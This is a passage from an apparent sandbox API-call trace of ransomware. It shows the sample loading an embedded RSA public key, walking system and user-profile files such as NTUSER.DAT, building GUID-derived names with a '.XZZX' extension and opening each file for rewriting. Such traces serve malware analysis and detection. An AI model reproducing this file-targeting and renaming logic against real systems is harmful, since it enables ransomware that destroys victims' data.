MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0098.981] lstrcpyW (in: lpString1=0x420f460, lpString2="hiberfil.sys" | out: lpString1="hiberfil.sys") returned="hiberfil.sys" [0098.981] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\" | out: lpString1="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0098.981] SetErrorMode (uMode=0x1) returned 0x1 [0098.981] lstrcpyW (in: lpString1=0x420f860, lpString2="hiberfil.sys" | out: lpString1="hiberfil.sys") returned="hiberfil.sys" [0098.981] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x4f620a86, Data2=0xfe2a, Data3=0x4b9a, Data4=([0]=0xad, [1]=0x65, [2]=0x2d, [3]=0x49, [4]=0x79, [5]=0xbc, [6]=0x79, [7]=0x8))) returned 0x0 [0098.981] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\hiberfil.sys") returned 19 [0098.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0098.981] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\4C86ADFC4B0F33444F620A864F30178C.XZZX") returned 44 [0098.981] StrStrW (lpFirst="hiberfil.sys", lpSrch="XZZX") returned 0x0 [0098.981] SetFileAttributesW (lpFileName="\\\\?\\C:\\hiberfil.sys", dwFileAttributes=0x20) returned 0 [0098.982] CreateFileW (lpFileName="\\\\?\\C:\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 259 os_tid = 0x7ec [0099.141] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0099.141] lstrcpyW (in: lpString1=0x420f460, lpString2="pagefile.sys" | out: lpString1="pagefile.sys") returned="pagefile.sys" [0099.141] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\" | out: lpString1="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0099.141] SetErrorMode (uMode=0x1) returned 0x1 [0099.141] lstrcpyW (in: lpString1=0x420f860, lpString2="pagefile.sys" | out: lpString1="pagefile.sys") returned="pagefile.sys" [0099.141] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x98e3732e, Data2=0x7fc8, Data3=0x42c4, Data4=([0]=0x97, [1]=0x7b, [2]=0x9b, [3]=0xf5, [4]=0x12, [5]=0xcd, [6]=0xcd, [7]=0x18))) returned 0x0 [0099.141] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\pagefile.sys") returned 19 [0099.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0099.141] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\47D5CDF02153652098E3732E25744968.XZZX") returned 44 [0099.141] StrStrW (lpFirst="pagefile.sys", lpSrch="XZZX") returned 0x0 [0099.141] SetFileAttributesW (lpFileName="\\\\?\\C:\\pagefile.sys", dwFileAttributes=0x20) returned 0 [0099.141] CreateFileW (lpFileName="\\\\?\\C:\\pagefile.sys" (normalized: "c:\\pagefile.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 260 os_tid = 0x344 [0099.416] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0099.416] lstrcpyW (in: lpString1=0x420f460, lpString2="D2D9507033A5E4DB82B20D90383EC923.XZZX" | out: lpString1="D2D9507033A5E4DB82B20D90383EC923.XZZX") returned="D2D9507033A5E4DB82B20D90383EC923.XZZX" [0099.416] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\" | out: lpString1="\\\\?\\C:\\Users\\") returned="\\\\?\\C:\\Users\\" [0099.416] SetErrorMode (uMode=0x1) returned 0x1 [0099.416] lstrcpyW (in: lpString1=0x420f860, lpString2="D2D9507033A5E4DB82B20D90383EC923.XZZX" | out: lpString1="D2D9507033A5E4DB82B20D90383EC923.XZZX") returned="D2D9507033A5E4DB82B20D90383EC923.XZZX" [0099.416] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xf02b4d73, Data2=0xa253, Data3=0x4e1f, Data4=([0]=0x8c, [1]=0xe, [2]=0x4e, [3]=0xd4, [4]=0xdb, [5]=0xe1, [6]=0xe3, [7]=0xc9))) returned 0x0 [0099.416] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\D2D9507033A5E4DB82B20D90383EC923.XZZX") returned 50 [0099.416] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0099.416] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\450CE2493188F20DF02B4D7335A9D655.XZZX") returned 50 [0099.416] StrStrW (lpFirst="D2D9507033A5E4DB82B20D90383EC923.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 261 os_tid = 0x798 [0099.568] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0099.569] lstrcpyW (in: lpString1=0x420f460, lpString2="97978E0428D9BCBB43314AFC2CD2A103.XZZX" | out: lpString1="97978E0428D9BCBB43314AFC2CD2A103.XZZX") returned="97978E0428D9BCBB43314AFC2CD2A103.XZZX" [0099.569] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0099.569] SetErrorMode (uMode=0x1) returned 0x1 [0099.569] lstrcpyW (in: lpString1=0x420f860, lpString2="97978E0428D9BCBB43314AFC2CD2A103.XZZX" | out: lpString1="97978E0428D9BCBB43314AFC2CD2A103.XZZX") returned="97978E0428D9BCBB43314AFC2CD2A103.XZZX" [0099.569] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xef9a2e10, Data2=0xf0d0, Data3=0x4d8a, Data4=([0]=0x96, [1]=0x77, [2]=0xaa, [3]=0x38, [4]=0x48, [5]=0x3b, [6]=0xb0, [7]=0xc2))) returned 0x0 [0099.569] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\97978E0428D9BCBB43314AFC2CD2A103.XZZX") returned 71 [0099.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0099.569] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\38746D0048F06020EF9A2E104D114468.XZZX") returned 71 [0099.569] StrStrW (lpFirst="97978E0428D9BCBB43314AFC2CD2A103.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 262 os_tid = 0x6a4 [0099.738] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0099.738] lstrcpyW (in: lpString1=0x420f460, lpString2="NTUSER.DAT" | out: lpString1="NTUSER.DAT") returned="NTUSER.DAT" [0099.738] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0099.738] SetErrorMode (uMode=0x1) returned 0x1 [0099.739] lstrcpyW (in: lpString1=0x420f860, lpString2="NTUSER.DAT" | out: lpString1="NTUSER.DAT") returned="NTUSER.DAT" [0099.739] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x8524bb84, Data2=0xa920, Data3=0x4efc, Data4=([0]=0x90, [1]=0x4c, [2]=0xc2, [3]=0x55, [4]=0xd2, [5]=0x8f, [6]=0x49, [7]=0x4c))) returned 0x0 [0099.739] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT") returned 44 [0099.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0099.739] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\E4619480342E3B808524BB84384F1FC8.XZZX") returned 71 [0099.739] StrStrW (lpFirst="NTUSER.DAT", lpSrch="XZZX") returned 0x0 [0099.739] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT", dwFileAttributes=0x20) returned 1 [0099.739] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 263 os_tid = 0x780 [0099.899] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0099.899] lstrcpyW (in: lpString1=0x420f460, lpString2="ntuser.dat.LOG1" | out: lpString1="ntuser.dat.LOG1") returned="ntuser.dat.LOG1" [0099.899] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0099.899] SetErrorMode (uMode=0x1) returned 0x1 [0099.899] lstrcpyW (in: lpString1=0x420f860, lpString2="ntuser.dat.LOG1" | out: lpString1="ntuser.dat.LOG1") returned="ntuser.dat.LOG1" [0099.899] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x2a6931ad, Data2=0x3d67, Data3=0x44ab, Data4=([0]=0xb0, [1]=0x70, [2]=0x99, [3]=0x94, [4]=0x61, [5]=0x81, [6]=0xeb, [7]=0x65))) returned 0x0 [0099.899] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1") returned 49 [0099.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0099.899] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\2129359B10785FCD2A6931AD14994415.XZZX") returned 71 [0099.899] StrStrW (lpFirst="ntuser.dat.LOG1", lpSrch="XZZX") returned 0x0 [0099.899] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1", dwFileAttributes=0x20) returned 1 [0099.900] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 264 os_tid = 0x688 [0100.049] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0100.049] lstrcpyW (in: lpString1=0x420f460, lpString2="ntuser.dat.LOG2" | out: lpString1="ntuser.dat.LOG2") returned="ntuser.dat.LOG2" [0100.049] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0100.049] SetErrorMode (uMode=0x1) returned 0x1 [0100.049] lstrcpyW (in: lpString1=0x420f860, lpString2="ntuser.dat.LOG2" | out: lpString1="ntuser.dat.LOG2") returned="ntuser.dat.LOG2" [0100.049] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x7193a60b, Data2=0x44a5, Data3=0x4be6, Data4=([0]=0xa7, [1]=0xba, [2]=0xbd, [3]=0x1e, [4]=0x1b, [5]=0xf8, [6]=0x29, [7]=0x88))) returned 0x0 [0100.050] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2") returned 49 [0100.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0100.050] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\6C44F117145A033E7193A60B187AE786.XZZX") returned 71 [0100.050] StrStrW (lpFirst="ntuser.dat.LOG2", lpSrch="XZZX") returned 0x0 [0100.050] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2", dwFileAttributes=0x20) returned 1 [0100.050] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 265 os_tid = 0x60c [0100.209] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0100.209] lstrcpyW (in: lpString1=0x420f460, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" [0100.209] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0100.209] SetErrorMode (uMode=0x1) returned 0x1 [0100.209] lstrcpyW (in: lpString1=0x420f860, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" [0100.209] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x735cbbe0, Data2=0x813d, Data3=0x43ac, Data4=([0]=0x9a, [1]=0x47, [2]=0xb8, [3]=0x9d, [4]=0x91, [5]=0x42, [6]=0xe4, [7]=0xd7))) returned 0x0 [0100.209] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 89 [0100.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0100.209] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\37C4A4602229CBFC735CBBE0264AB044.XZZX") returned 71 [0100.209] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="XZZX") returned 0x0 [0100.209] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", dwFileAttributes=0x20) returned 1 [0100.209] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 266 os_tid = 0x634 [0100.363] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- 